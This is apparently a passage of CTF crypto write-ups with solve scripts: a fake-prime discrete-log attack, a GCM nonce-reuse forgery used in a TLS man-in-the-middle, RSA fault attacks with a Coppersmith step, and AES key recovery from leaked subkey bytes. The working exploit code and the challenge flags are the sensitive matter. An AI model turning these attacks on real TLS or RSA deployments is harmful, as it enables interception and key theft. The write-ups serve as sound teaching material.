q = 409 * 421 * 443 * 463 * 521 * 613 * 617 * 631 * 661 * 673 * 859 * 881 * 911 * 937 * 953 * 991 * 1021 * 1123 * 1171 * 1249 * 1321 * 1327 * 1361 * 1429 * 1531 * 1871 * 1873 * 2003 * 2081 * 2143 * 2311 * 2381 * 2731 * 2857 * 2861 * 3061 * 3169 * 3361 * 3433 * 3571 * 3697 * 4421 * 4621 * 5237 * 5281 * 6007 * 6121 * 6553 * 6733 * 7481 * 8009 * 8191 * 8581 * 8737 * 9241 * 9283 * 10711 * 12377 * 13729 * 14281 * 16831 * 17137 * 17681 * 18481 * 19891 * 20021 * 20593 * 21841 * 23563 * 24481 * 25741 * 26209 * 27847 * 29173 * 29921 * 30941 * 34273 * 36037 * 42841 * 43759 * 46411 * 48049 * 52361 * 53857 * 55441 * 63649 * 65521 * 72073 * 72931 * 74257 * 78541 * 79561 * 87517 * 92821 * 96097 * 97241 * 110881 * 116689 * 117811 * 131041 * 145861 * 148513 * 157081 * 180181 * 185641 * 209441 * 235621 * 269281 * 291721 * 314161 * 371281 * 388961 * 445537 * 471241 * 680681 * 700129 * 816817 * 1633633 * 8168161.
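The construction can be seen on a toy scale in plain Python 3. This is only a sketch of the idea, with a deliberately tiny lambda of 120 and exhaustive subset search instead of the randomized search used above; the is_prime helper here is a naive trial division of our own.

```python
from itertools import combinations
from math import prod

def is_prime(n):
    return n > 1 and all(n % d for d in range(2, int(n ** 0.5) + 1))

lam = 120  # toy value; the write-up uses a much larger, smoother number
# Primes p with (p - 1) | lam and p not dividing lam.
P = [p for p in range(2, lam + 2)
     if is_prime(p) and lam % (p - 1) == 0 and lam % p != 0]

carmichaels = []
for size in range(3, len(P) + 1):
    for subset in combinations(P, size):
        n = prod(subset)
        # n = 1 (mod lam) implies (p - 1) | (n - 1) for every p in the subset,
        # which is Korselt's criterion for a squarefree n.
        if n % lam == 1:
            carmichaels.append(n)

print(P)
print(carmichaels)
```

Among the results is 41041 = 7 * 11 * 13 * 41. The real search works the same way, only with thousands of candidate primes, which is why it samples random subsets instead of enumerating them.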

Solving the discrete log

After finding good $p$ and $q$, the rest of the problem is easy. First, since we can't bypass the test 100% of the time, we have to make a few attempts. Then, once the tests pass, we need to solve the discrete logarithm problem. Luckily, Sage automatically factors the modulus (and all the group orders) and applies the Pohlig-Hellman method. Since the factors are small, we don't need to supply our factorization to Sage; it finds it quickly on its own. We only have to ask Sage to compute $discrete\_log(y, g)$!

from sage.all import *
from sock import *

q = 59857999685097510058704903303340275550835640940514904342609260821117098340506319476802302889863926430165796687108736694628663794024203081690831548926936527743286188479060985861546093711311571900661759884274719541236402441770905441176260283697893506556009435089259190308034118717196693029323272007089714272903225216389846915864612112381878100108428287917605430965442572234711074146363466926780699151173555904751392997928289187479977403795442182731620805949932616667193358004913424246140299423521
p = 62524500763431441748481642690708441489776386892126187254070724779722504054292898512943722029745633023670685560530873804922086432332770562190282869379418979194485569141426416326281184435782910942683630763055432514713734358605440032411156894024431274583468338817956399407807741136790938228633811230955007519469063632837378284757301519562677312080310137628454021752642170957113443979650111115572728879157653822412120689975685302219422272533094042684647476957834486986793341

itr = 0
while 1:
    itr += 1
    print "Try #%d" % itr
    f = Sock("104.198.63.175 1729")
    f.send_line(str(q))
    f.send_line(str(p))
    ans = f.read_line()
    print `ans`
    if "Traceback" in ans:
        print ans
        print f.read_all()
        continue

    print "Primes are accepted! Getting discrete log"
    g, y = [int(ss[2:], 16) for ss in ans.split()]
    R = IntegerModRing(q)
    x = discrete_log(R(y), R(g))
    print "x", x
    print "y", y
    print "correct ?", pow(g, x, q) == y
    f.send_line(str(x))

    print f.read_all()
    break

After a few iterations, we get the flag: hxp{5cHr0eD1n9eR's_Pr1m3z}
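To see why the logarithm is easy once the modulus is a product of small primes, here is a toy Python 3 sketch of the idea: solve the logarithm modulo each prime factor by brute force and merge the results with a CRT that tolerates non-coprime moduli. It is not what Sage does internally; the helper names and the toy modulus 561 are our own choices.

```python
from math import gcd

def dlog_small_prime(g, y, r):
    """Brute-force x and the order of g with g^x = y (mod r), r a small prime."""
    cur, x = 1, None
    for i in range(r):
        if cur == y % r and x is None:
            x = i
        cur = cur * g % r
        if cur == 1:
            return x, i + 1
    raise ValueError("g is not invertible modulo %d" % r)

def crt_merge(a1, m1, a2, m2):
    """Combine x = a1 (mod m1) and x = a2 (mod m2); the moduli may share factors."""
    g = gcd(m1, m2)
    if (a2 - a1) % g:
        raise ValueError("inconsistent congruences")
    step = m2 // g
    inv = pow(m1 // g, -1, step) if step > 1 else 0
    t = (a2 - a1) // g * inv % step
    return (a1 + m1 * t) % (m1 * step), m1 * step

factors = [3, 11, 17]          # toy "false prime" q = 561
q = 3 * 11 * 17
g, secret = 2, 37
y = pow(g, secret, q)

x, modulus = 0, 1
for r in factors:
    xr, order = dlog_small_prime(g % r, y % r, r)
    x, modulus = crt_merge(x, modulus, xr, order)
print(x, modulus, pow(g, x, q) == y)
```

For the real $q$ the per-prime logarithms would use baby-step giant-step rather than a linear scan, but the largest prime factor is only about 8 million, so either way the work is small.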

TUM CTF 2016 – ndis (Crypto 300)

hellman — Sun, 02 Oct 2016 16:47:55 +0000

We have a HTTPS server and client talking to each other with you right in the middle! The client essentially executes

curl --cacert server.crt https://nsa.gov

with some magic to redirect the transmitted data to your socket, to which the server responds with a lovely German-language poem.

NOTE: There is nothing else hosted on the server; no need to brute-force filenames. Moreover, it may behave untypically due to hackiness.

Your task is to make the client receive a CTF-themed adaption of another German poem instead; to be precise, the HTTP response must consist of the following bytes:
5761 6c6c 6521 2057 616c 6c65 0a4d 616e  |Walle! Walle.Man|
6368 6520 5374 7265 636b 652c 0a44 6173  |che Strecke,.Das|
7320 7a75 6d20 5a77 6563 6b65 0a46 6c61  |s zum Zwecke.Fla|
6767 656e 2066 6c69 65c3 9f65 6e2c 0a55  |ggen flie..en,.U|
6e64 206d 6974 2072 6569 6368 656d 2c20  |nd mit reichem, |
766f 6c6c 656d 2053 6368 7761 6c6c 650a  |vollem Schwalle.|
5a75 2064 656e 2050 756e 6b74 656e 2073  |Zu den Punkten s|
6963 6820 6572 6769 65c3 9f65 6e2e 0a    |ich ergie..en..|
Upon receiving this response from the server, the client sends the flag to you through the same connection used to intercept the HTTPS traffic, so make sure not to overlook it!

Server: https://130.211.200.153:4433
Client: nc 130.211.200.153 9955

(If you just forward everything from one of those ports to the other, the connection succeeds and everything works fine. Then hack.)

NOTE: The setup for this challenge is not entirely trivial, so if you’re confused about unexpected things happening, please contact yyyyyyy on IRC. There is also a good chance something’s broken.

EPIC HINT published six hours before the end: The server’s ciphersuites have been carefully chosen to allow this attack. (Plus the server was patched a little bit.)

Summary: attacking nonce-repeating TLS server using AES-GCM cipher.

Here we have to implement a man-in-the-middle attack against a custom TLS server. The ciphersuite used is ECDHE-ECDSA-AES128-GCM-SHA256, which is normally secure, and all other ciphersuites are disabled. After the hint was given we concentrated on this ciphersuite and looked for possible attacks. AES-GCM is known to be very weak if the tag length is small. So googling for “tls aes gcm tag length” yielded the recent paper Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS. It also matches the task name “ndis”.

So the idea of the attack is that when nonces are repeated (due to weak random, for example), then it is possible to recover authentication key from the GCM and make forgeries.
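The core of the key recovery can be sketched in pure Python 3 for the simplest possible case: two single-block ciphertexts, no associated data, same nonce. The random mask below is a stand-in for the AES output that GCM xors into the tag (an assumption of this sketch, since no AES is implemented here). Real TLS records are longer, and then recovering the key requires finding roots of a higher-degree polynomial, which is what the paper's tool does.

```python
import random

R = 0xE1 << 120      # reduction constant for GCM's bit-reflected GF(2^128)
ONE = 1 << 127       # multiplicative identity in that representation

def gf_mul(x, y):
    z, v = 0, y
    for i in range(128):
        if (x >> (127 - i)) & 1:
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1
    return z

def gf_pow(x, e):
    result = ONE
    while e:
        if e & 1:
            result = gf_mul(result, x)
        x = gf_mul(x, x)
        e >>= 1
    return result

def tag(h, mask, c):
    """GCM tag of a single ciphertext block c with no associated data."""
    length_block = 128   # 64-bit AAD bit length (0) || 64-bit ciphertext bit length
    return gf_mul(gf_mul(c, h) ^ length_block, h) ^ mask

rng = random.Random(2016)
h = rng.getrandbits(128)       # secret authentication key H
mask = rng.getrandbits(128)    # stand-in for E_K(J0); equal because the nonce repeats
c1, c2 = rng.getrandbits(128), rng.getrandbits(128)
t1, t2 = tag(h, mask, c1), tag(h, mask, c2)

# The mask and the length term cancel: t1 ^ t2 = (c1 ^ c2) * H^2.
h_squared = gf_mul(t1 ^ t2, gf_pow(c1 ^ c2, 2**128 - 2))
h_recovered = gf_pow(h_squared, 2**127)      # square root in GF(2^128)

# Forge a tag for an xor-modified ciphertext without knowing the AES key.
c_forged = c1 ^ 0x030701
t_forged = t1 ^ gf_mul(gf_mul(c1 ^ c_forged, h_recovered), h_recovered)
print(h_recovered == h, t_forged == tag(h, mask, c_forged))
```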

There is a proof-of-concept tool by the paper authors: https://github.com/nonce-disrespect/nonce-disrespect. In order to compile it, we need the latest NTL library.

The main tool there is gcmproxy. This proxy captures TLS packets and waits until nonces are repeated. Then the key is reconstructed and we can modify packets. Note that we can’t decrypt packets, only modify them by xor! So one of the problems is to figure out which fragments contain which data, in order to know what to xor and where. The hard part is that each time we debug a forgery, we have to wait until nonces collide on the server. Nonces were 1-byte values and they must collide in the first ~5 packets.

After debugging it a lot, we arrived at the following modification to the forgery function:

func forgeRecord(rec1 *TLSRecord, key *GCMAuthKey) (rec2 *TLSRecord) {
	fragment := make([]byte, rec1.Header.FragmentLength)
	copy(fragment, rec1.Fragment)

	fmt.Println(rec1)

	// modify content-length: 256 -> 127
	if len(fragment) == 45 {
		payload, err := hex.DecodeString("030701")
		if err != nil {panic(err)}
		xor(fragment[16+8:], payload)
	}
	// modify poem
	if len(fragment) == 280 {
		payload, err := hex.DecodeString("3815180316014d38111f665837705c535e55581d6e7e780a171f0a5f2a290e0300000e07025420036f0c1f11657c4c070815114e4d091c1a45a5f0171a2665211a0b534d041b500145010c1816190c46191d18660a19543c5948040e1f036f003501540b45064f3c014e001b0e1d2a1c1d1707000d1d0b1d45acfd161a246574746f20686f726368740a6f74746f3a206d6f7073206d6f70730a6f74746f20686f6666740a0a6f74746f73206d6f7073206b6c6f7066740a6f74746f3a206b6f6d6d206d6f7073206b6f6d6d0a6f74746f73206d6f7073206b6f6d6d740a6f74746f73206d6f7073206b6f747a740a6f74746f3a206f676f74746f676f74740a")
		if err != nil {panic(err)}
		xor(fragment[8:], payload)
	}

	rec2 = &TLSRecord{rec1.Header, rec1.SeqNo, fragment}

        ...
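The xor payloads in the function above are simply the known plaintext xored with the desired plaintext. A short Python 3 sketch for the content-length case; the keystream bytes are hypothetical and only serve to show that the trick works without knowing them:

```python
def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Payload that turns the known header digits "256" into "127".
payload = xor_bytes(b"256", b"127")
print(payload.hex())  # 030701

# Hypothetical keystream: in counter-mode encryption,
# ciphertext = plaintext xor keystream, so xoring the payload
# into the ciphertext rewrites the plaintext underneath.
keystream = bytes([0x5a, 0xc3, 0x17])
ciphertext = xor_bytes(b"256", keystream)
tampered = xor_bytes(ciphertext, payload)
print(xor_bytes(tampered, keystream))  # b'127'
```

The long payload for the poem is built the same way from the original poem and the target poem, which is why the original response has to be known byte for byte.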

Then we ran it as follows (a few times):

# run proxy
$ ./gcmproxy -l=127.0.0.1:5001 -r=130.211.200.153:4433 -w=127.0.0.1:5002
# connect client to proxy
$ socat -v tcp:130.211.200.153:9955 tcp:127.0.0.1:5001 2>&1
...
..............g..4Dp...:&f...[.> 2016/10/02 15:49:28.750616  length=28 from=529 to=556
hxp{NTw1C3:_n0t_ev3n_0nce.}

The flag: hxp{NTw1C3:_n0t_ev3n_0nce.}

PS: the challenge is quite obviously relying on using the PoC tool, because coding the full attack from scratch would take way more time (and is a bit boring).

CSAW Quals 2016 – Broken Box (Crypto 300 + 400)

hellman — Sun, 18 Sep 2016 22:19:04 +0000

I made a RSA signature box, but the hardware is too old that sometimes it returns me different answers… can you fix it for me?

e = 0x10001

nc crypto.chal.csaw.io 8002

Summary: fault attack on RSA signatures, factoring using private exponent exposure.

In these two challenges we were given black-box access to an RSA signing (decryption) oracle. We need to decrypt a given flag, but the oracle only allows signing values in the range 0-9999. Moreover, it sometimes gives different signatures for the same value, because of the faults due to “hardware errors” mentioned in the description.

Part 1

The simplest fault attacks on RSA are attacks on RSA-CRT, where we can factor the modulus using a gcd. However, we tried them and they failed, so the server is probably not using RSA-CRT.

By sampling signatures of, let’s say number 2, we can find that there are about 1000 unique values. It matches the size of the modulus in bits. Then it may be that the server flips some single bit of the secret exponent sometimes. There was a similar challenge already at this year’s Plaid CTF, but there we didn’t get enough bits.

Here’s how we can check our hypothesis: if we get $s = 2^{d \oplus 2^k} \mod{N}$ for some $k$, we can guess $k$ and check whether $(s\times 2^{\pm 2^k})^e \mod N = 2$. If this condition holds, then we learn bit $k$ of the secret exponent; its value is determined by the sign in $\pm 2^k$.
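The check can be tried out offline on a toy key. The Python 3 sketch below simulates the faulty box itself (faulty_sign is our stand-in for the server) with deliberately tiny, hypothetical parameters, and recovers every bit of $d$ from single-bit-flip signatures:

```python
# Toy RSA parameters (hypothetical, far too small for real use).
p, q, e = 11, 23, 3
N = p * q
d = pow(e, -1, (p - 1) * (q - 1))   # 147
m = 2

def faulty_sign(k):
    """Simulate a signature computed with bit k of d flipped."""
    return pow(m, d ^ (1 << k), N)

def classify(sig, nbits):
    """Return (k, original value of bit k) for a single-bit-flip signature."""
    test = pow(sig, e, N)
    for k in range(nbits):
        shift = pow(m, e << k, N)
        if test == m * shift % N:
            return k, 0          # the flip added 2^k, so the bit was 0
        if test == m * pow(shift, -1, N) % N:
            return k, 1          # the flip subtracted 2^k, so the bit was 1
    return None

nbits = d.bit_length()
bits = dict(classify(faulty_sign(k), nbits) for k in range(nbits))
recovered = sum(bit << k for k, bit in bits.items())
print(recovered == d)
```

With a modulus this small the approach only works because the 16 test values happen to be distinct; with a 1024-bit modulus collisions are not a practical concern.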

Indeed, the following script waits to collect all unknown bits and prints the flag for the first part:

import ast
from sock import Sock
from libnum import *

N = 172794691472052891606123026873804908828041669691609575879218839103312725575539274510146072314972595103514205266417760425399021924101213043476074946787797027000946594352073829975780001500365774553488470967261307428366461433441594196630494834260653022238045540839300190444686046016894356383749066966416917513737
E = 0x10001
sig_correct = 22611972523744021864587913335128267927131958989869436027132656215690137049354670157725347739806657939727131080334523442608301044203758495053729468914668456929675330095440863887793747492226635650004672037267053895026217814873840360359669071507380945368109861731705751166864109227011643600107409036145468092331
C = int(open("flag.enc").read())

f = Sock("crypto.chal.csaw.io 8002")
f.send_line("2")
f.read_until("no")

def sign(val):
    f.send_line("yes")
    f.send_line("%d" % val)
    sig, mod = map(int, f.read_until_re(r"signature:(\d+), N:(\d+)\s").groups())
    assert mod == N
    return sig

try:
    bits, vals = ast.literal_eval(open("dump").read())
except:
    bits, vals = {}, []
vals = set(vals)

print len(bits), "known bits"
num = 2

gs = {
    num * pow(num, (1 << e) * E, N) % N
    : e for e in xrange(0, 1030)
}
gsi = {
    (num * invmod(pow(num, (1 << e) * E, N), N)) % N
    : e for e in xrange(0, 1030)
}

while 1:
    if len(bits) >= 1024:
        print len(bits), "known", set(range(1025)) - set(bits), "unknown"
        d = sum(1 << e for e, b in bits.items() if b)
        print "Try:", `n2s(pow(C, d, N))`

    sig = sign(num)
    if sig in vals:
        continue
    vals.add(sig)
    test = pow(sig, E, N)
    if test in gs:
        bits[gs[test]] = 0
        print "bit[%d] = 0" % gs[test]
    if test in gsi:
        bits[gsi[test]] = 1
        print "bit[%d] = 1" % gsi[test]
    open("dump","w").write(`(bits, list(vals))`)
    print len(bits), "known bits"

The flag: flag{br0k3n_h4rdw4r3_l34d5_70_b17_fl1pp1n6}

Part 2

In the second part, the server has faults only in the 300 least significant bits of the secret exponent.

There is an LLL-based attack for the case when more than a quarter of the secret exponent bits are known. You can read more about these attacks in the awesome paper "Twenty Years of Attacks on the RSA Cryptosystem" by Dan Boneh (page 11):

$$ed - k\phi(N) = 1, ~\mbox{where}~ k < e$$
$$ed - k(N - p - q + 1) = 1$$
$$ed - k(N - p - q + 1) \equiv 1 \pmod {2^l}, ~\mbox{where}~ l = 300$$
$$ped - k(Np - p^2 - N + p) \equiv p \pmod {2^l}$$

We can guess $k < e$ and then we have a quadratic equation in the least significant bits of $p$ (since everything is taken modulo $2^l$, only the known low $l$ bits of $d$ are needed). We can solve this quadratic equation bit-by-bit by solving it modulo 2, 4, 8, etc.
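Rearranged, the last congruence reads $kp^2 + (ed - kN - k - 1)p + kN \equiv 0 \pmod{2^l}$. Here is a toy Python 3 sketch of the bit-by-bit lifting, on a small hypothetical key with only 10 known low bits of $d$; the names roots_mod_power2 and candidates are ours:

```python
p, q, e = 10007, 10009, 97        # toy primes, chosen only for illustration
N, phi = p * q, (p - 1) * (q - 1)
d = pow(e, -1, phi)
L = 10                            # number of known low bits of d
d_low = d % (1 << L)

def roots_mod_power2(a, b, c, bits):
    """Lift roots of a*x^2 + b*x + c = 0 from mod 2 up to mod 2^bits."""
    roots = {0}
    for cur in range(1, bits + 1):
        mod = 1 << cur
        # each root mod 2^(cur-1) extends in two ways; keep those that still fit
        roots = {v for r in roots for v in (r, r + (mod >> 1))
                 if (a * v * v + b * v + c) % mod == 0}
    return roots

candidates = {}
for k in range(1, e):
    found = roots_mod_power2(k, e * d_low - k * N - k - 1, k * N, L)
    if found:
        candidates[k] = found

k_true = (e * d - 1) // phi
print(k_true, p % (1 << L) in candidates[k_true])
```

Wrong guesses of $k$ also produce candidate roots, so each candidate still has to be confirmed, which is what the Coppersmith step does in the full attack.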

After finding the 300 least significant bits of $p$, we can use the Coppersmith method for finding small roots of polynomials modulo $p$: assume we know $t$ and $r$ such that $p = rx + t$. In our case $r$ is $2^{300}$. We multiply both sides by the inverse of $r$ modulo $N$: $r^{-1}p = x + r^{-1}t \pmod{N}$. We see that $x$ is a small root of the polynomial $x + r^{-1}t$ modulo $p$, so we can compute it with Coppersmith’s method.

Here's the full code (Sage):

from sage.all import *

N = 123541066875660402939610015253549618669091153006444623444081648798612931426804474097249983622908131771026653322601466480170685973651622700515979315988600405563682920330486664845273165214922371767569956347920192959023447480720231820595590003596802409832935911909527048717061219934819426128006895966231433690709
E = 97
C = 96324328651790286788778856046571885085117129248440164819908629761899684992187199882096912386020351486347119102215930301618344267542238516817101594226031715106436981799725601978232124349967133056186019689358973953754021153934953745037828015077154740721029110650906574780619232691722849355713163780985059673037
L = 300

bits = [0, 2, 3, 5, 6, 7, 9, 10, 11, 13, 15, 16, 17, 18, 19, 22, 23, 25, 26, 27, 31, 32, 33, 35, 36, 39, 40, 41, 44, 45, 46, 48, 49, 52, 54, 55, 56, 60, 62, 63, 64, 67, 68, 72, 73, 74, 76, 80, 82, 83, 85, 88, 89, 91, 92, 93, 94, 98, 99, 101, 108, 109, 113, 115, 116, 117, 118, 119, 122, 128, 129, 131, 132, 133, 135, 142, 143, 144, 147, 152, 153, 156, 157, 160, 164, 166, 167, 168, 169, 170, 175, 177, 180, 181, 182, 185, 186, 189, 192, 193, 194, 195, 196, 197, 199, 202, 203, 205, 207, 208, 209, 211, 213, 215, 216, 217, 219, 220, 221, 222, 223, 225, 226, 227, 230, 233, 234, 235, 236, 238, 240, 242, 246, 247, 249, 252, 253, 255, 263, 264, 265, 266, 268, 271, 272, 273, 275, 276, 280, 285, 287, 288, 293, 294]
dlow = sum(2**e for e in bits)

x = PolynomialRing(Zmod(N), names='x').gen()

mod = 1 << L
imod = inverse_mod(mod, N)

def solve_quadratic_mod_power2(a, b, c, e):
    roots = {0}
    for cure in xrange(1, e + 1):
        roots2 = set()
        curmod = 1 << cure
        for xbit in xrange(2):
            for r in roots:
                v = r + (xbit << (cure - 1))
                if (a*v*v + b*v + c) % curmod == 0:
                    roots2.add(v)
        roots = roots2
    return roots


for k in xrange(1, E):
    a = k
    b = E*dlow - k*N - k - 1
    c = k*N
    for plow in solve_quadratic_mod_power2(a, b, c, L):
        print "k", k, "plow", plow
        roots = (x + plow * imod).small_roots(X=2**(215), beta=0.4)
        print "Roots", roots
        if roots:
            root = int(roots[0])
            kq = root + plow * imod
            q = gcd(N, kq)
            assert 1 < q < N, "Fail"
            p = N / q
            d = inverse_mod(E, (p - 1) * (q - 1))
            msg = pow(C, d, N)
            # convert to str
            h = hex(int(msg))[2:].rstrip("L")
            h = "0" * (len(h) % 2) + h
            print `h.decode("hex")`
            quit()

And for $k=53$ we get the flag: flag{n3v3r_l34k_4ny_51n6l3_b17_0f_pr1v473_k3y}.

Tokyo Westerns/MMA CTF 2016 – Backdoored Crypto System (Reverse+Crypto 400)

hellman — Mon, 05 Sep 2016 16:02:44 +0000

Get the flag.

bcs.7z

$ nc bcs.chal.ctf.westerns.tokyo 3971

Summary: recovering AES key from partial subkey leaks.

The challenge allows us to encrypt any text and to encrypt the flag:

$ ./bcs 
> encrypt asd 
Encrypted: 6c4bb9114b4db65c2a0e7043f7693c2d
> decrypt asd
command not found
> flag
OK. I'll give you the flag.
Encrypted: 97ee6e2e2824906e9f4870553c7b4f49

1. Reverse-Engineering

Reversing the binary was pretty easy. The decompiled encryption function:

int __fastcall sub_400B20(const __m128i *a1, const __m128i *a2, __m128i *a3)
{
  ...
  v3 = a3;
  v4 = 0LL;
  v11 = _mm_loadu_si128(a2);
  _XMM3 = _mm_xor_si128(v11, _mm_loadu_si128(a1));
  for ( i = _mm_cvtsi32_si128(1u); ; i = _mm_cvtsi32_si128(dword_400EC0[v4]) )
  {
    __asm { aeskeygenassist xmm0, [rsp+58h+var_58], 0 }
    v8 = _mm_xor_si128(_mm_srli_si128(_XMM0, 12), v11);
    v9 = _mm_xor_si128(v8, _mm_slli_si128(v8, 4));
    v11 = _mm_xor_si128(_mm_xor_si128(_mm_shuffle_epi32(i, 0), _mm_slli_si128(v9, 8)), v9);
    if ( dword_6013AC != 322376503 )
      break;
    if ( v4 > 1 )
    {
      v12 = _XMM3;
      v14 = _mm_load_si128(&v11);
      v13 = v14;
      result = printf("%02x%02x", v11.m128i_u8[0], v14.m128i_u8[1], v11.m128i_i64[0]);
      _XMM3 = _mm_load_si128(&v12);
      break;
    }
LABEL_3:
    ++v4;
    __asm { aesenc  xmm3, [rsp+58h+var_58] }
    if ( v4 == 10 )
      goto LABEL_9;
  }
  if ( v4 != 9 )
    goto LABEL_3;
  __asm { aesenclast xmm3, [rsp+58h+var_58] }
LABEL_9:
  dword_6013AC = 0;
  *v3 = _XMM3;
  return result;
}

It uses AES-NI instructions so most likely it is AES. By debugging the binary and dumping the random key, we can easily verify that it is vanilla AES-128.

Interestingly, the global variable dword_6013AC triggers some leakage (recall the task name). To trigger it, we have to send command l34k1nf0 with value 322376503=0x13371337:

    v7 = memcmp(v13, "l34k1nf0 ", 9uLL) == 0;
    if ( v7 )
    {
      v6 = 0LL;
      dword_6013AC = strtol(&nptr, 0LL, 10);
    }

But what does it leak? It prints the first two bytes of some things, maybe subkeys or intermediate values. Let’s activate it:

$ gdb ./bcs 
gdb-peda$ b*0x400C7E  # calling encryption function
Breakpoint 1 at 0x400c7e

gdb-peda$ r
Starting program: /home/.../bcs 
> l34k1nf0 322376503
> encrypt 123
Breakpoint 1, 0x0000000000400c7e in ?? ()

gdb-peda$ x/16xc 0x6013b0   # the global array with random key
0x6013b0:   0x4a    0x93    0x64    0x71    0xf6    0x9d    0x55    0xb3
0x6013b8:   0xf 0x5f    0xc4    0xa5    0x80    0xec    0xef    0x8f

gdb-peda$ continue
Continuing.

ed22d3a6863bb017b97b6bb676dfd003631e849d4c109ee797708d576f4ac457

We now know that:

key = 0x4a,0x93,0x64,0x71,0xf6,0x9d,0x55,0xb3,0xf,0x5f,0xc4,0xa5,0x80,0xec,0xef,0x8f
leak = ed22d3a6863bb017b97b6bb676dfd003
enc("123") = 631e849d4c109ee797708d576f4ac457

Here’s the full expanded key (source code):

plaintext:   31 32 33 00 00 00 00 00 00 00 00 00 00 00 00 00
roundkey  0: 4a 93 64 71 f6 9d 55 b3 0f 5f c4 a5 80 ec ef 8f
roundkey  1: 85 4c 17 bc 73 d1 42 0f 7c 8e 86 aa fc 62 69 25
roundkey  2: 2d b5 28 0c 5e 64 6a 03 22 ea ec a9 de 88 85 8c
roundkey  3: ed 22 4c 11 b3 46 26 12 91 ac ca bb 4f 24 4f 37
roundkey  4: d3 a6 d6 95 60 e0 f0 87 f1 4c 3a 3c be 68 75 0b
roundkey  5: 86 3b fd 3b e6 db 0d bc 17 97 37 80 a9 ff 42 8b
roundkey  6: b0 17 c0 e8 56 cc cd 54 41 5b fa d4 e8 a4 b8 5f
roundkey  7: b9 7b 0f 73 ef b7 c2 27 ae ec 38 f3 46 48 80 ac
roundkey  8: 6b b6 9e 29 84 01 5c 0e 2a ed 64 fd 6c a5 e4 51
roundkey  9: 76 df 4f 79 f2 de 13 77 d8 33 77 8a b4 96 93 db
roundkey 10: d0 03 f6 f4 22 dd e5 83 fa ee 92 09 4e 78 01 d2
roundkey 11: 00 7f 43 db 22 a2 a6 58 d8 4c 34 51 96 34 35 83
roundkey 12: c0 e9 af 4b e2 4b 09 13 3a 07 3d 42 ac 33 08 c1
roundkey 13: a8 d9 d7 da 4a 92 de c9 70 95 e3 8b dc a6 eb 4a
roundkey 14: c1 30 01 5c 8b a2 df 95 fb 37 3c 1e 27 91 d7 54
roundkey 15: da 3e 21 90 51 9c fe 05 aa ab c2 1b 8d 3a 15 4f
ciphertext:  63 1e 84 9d 4c 10 9e e7 97 70 8d 57 6f 4a c4 57

Clearly, the leak contains first two bytes from subkeys for rounds 3-10 inclusive.
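This can be double-checked without the binary. Below is a self-contained Python 3 sketch of the AES-128 key expansion (the S-box is computed rather than hard-coded to keep the example short), applied to the key dumped in gdb above. The function names are ours.

```python
def gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11b
        b >>= 1
    return r

def sbox_byte(x):
    # field inverse (0 maps to 0) followed by the AES affine transform
    inv = next((y for y in range(1, 256) if gmul(x, y) == 1), 0)
    r = inv
    for i in range(1, 5):
        r ^= ((inv << i) | (inv >> (8 - i))) & 0xff
    return r ^ 0x63

SBOX = [sbox_byte(x) for x in range(256)]

def expand_key(key):
    """Return the 11 round keys of AES-128 as bytes objects."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # rotate, then substitute
            t[0] ^= rcon
            rcon = gmul(rcon, 2)
        words.append([a ^ b for a, b in zip(words[i - 4], t)])
    return [bytes(sum(words[4 * r:4 * r + 4], [])) for r in range(11)]

key = bytes.fromhex("4a936471f69d55b30f5fc4a580ecef8f")
round_keys = expand_key(key)
leak = b"".join(rk[:2] for rk in round_keys[3:11]).hex()
print(leak)
```

The printed string should coincide with the leak observed in gdb.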

2. Attempt with z3

Let’s first try to use z3py to solve it. We can use code from Belluminar’s ahyes challenge solution as a basis:

from z3.z3 import *
from aes import AES

AES = AES()
s = Solver()

# make AES sbox z3-friendly
sbox = AES.sbox[::]
AES.sbox = Array("sbox", BitVecSort(8), BitVecSort(8))
for x in xrange(256):
    s.add(AES.sbox[x] == sbox[x])

# symbolical key expansion almost for free :)
master = [BitVec("master%d" % i, 8) for i in xrange(16)]
exp = AES.expandKey(master, 16, 11*16)

leak = "ed22d3a6863bb017b97b6bb676dfd003".decode("hex")
leaks = map(ord, leak)
for i in xrange(0, len(leaks), 2):
    a, b = leaks[i:i+2]
    s.add(exp[(3+i/2)*16+0] == a)
    s.add(exp[(3+i/2)*16+1] == b)

print s.check()
key = ""
model = s.model()
for m in master:
    key += chr(model[m].as_long())
print key.encode("hex")

Running the script immediately spits out the key: 4a0820f57cd5983afb70581b22ec324f. However, it is the wrong key (though a few bytes match). By iterating over solutions we can see that there are many, around 2^32. That is a lot for z3 to iterate over, so we have to figure out the structure of those solutions ourselves.

3. AES-128 Key Schedule

The AES-128 key schedule works as follows: $subkey[0]=(a_0,b_0,c_0,d_0)$ is the master key, and all the subsequent subkeys are obtained by iteratively applying the following function:

Here $a,b,c,d$ are 32-bit words (think of them as 4 bytes), $S$ applies four 8-bit S-Boxes in parallel and rotates the word by 8 bits. Here is what we know from the leak (“+” are known bytes, “?” – unknown):

Note that we have leakage for 8 subkeys and the situation from picture occurs only 7 times (both $a_i$ and $a_{i+1}$ are leaked). This number will reduce in a funny way. Now let’s compute other bytes:

the output of $S$ is equal to $a_i \oplus a_{i+1}$.
by inverting $S$ we learn two middle (remember rotation) bytes of $d_i$.

By applying the same thing at the next two rounds, we obtain $d_{i+1}$ too. Note that this reduces the number of positions, and now we only have 6 such positions.

By continuing these simple computations we obtain that for $i = 8$ we know 12/16 subkey bytes.

Here are all computations:

# d[i] = S^-1[a[i] ^ a[i+1]]
for i in reversed(xrange(3, 10)):
    known[i][13] = isbox[known[i+1][0] ^ known[i][0] ^ rcon[i+1]]
    known[i][14] = isbox[known[i+1][1] ^ known[i][1]]

# c[i+1] = d[i] ^ d[i+1]
for i in reversed(xrange(4, 10)):
    known[i][10] = known[i][14] ^ known[i-1][14]
    known[i][9] = known[i][13] ^ known[i-1][13]

# b[i+1] = c[i] ^ c[i+1]
for i in reversed(xrange(5, 10)):
    known[i][6] = known[i][10] ^ known[i-1][10]
    known[i][5] = known[i][9] ^ known[i-1][9]

# a[i+1] = b[i] ^ b[i+1]
for i in reversed(xrange(6, 10)):
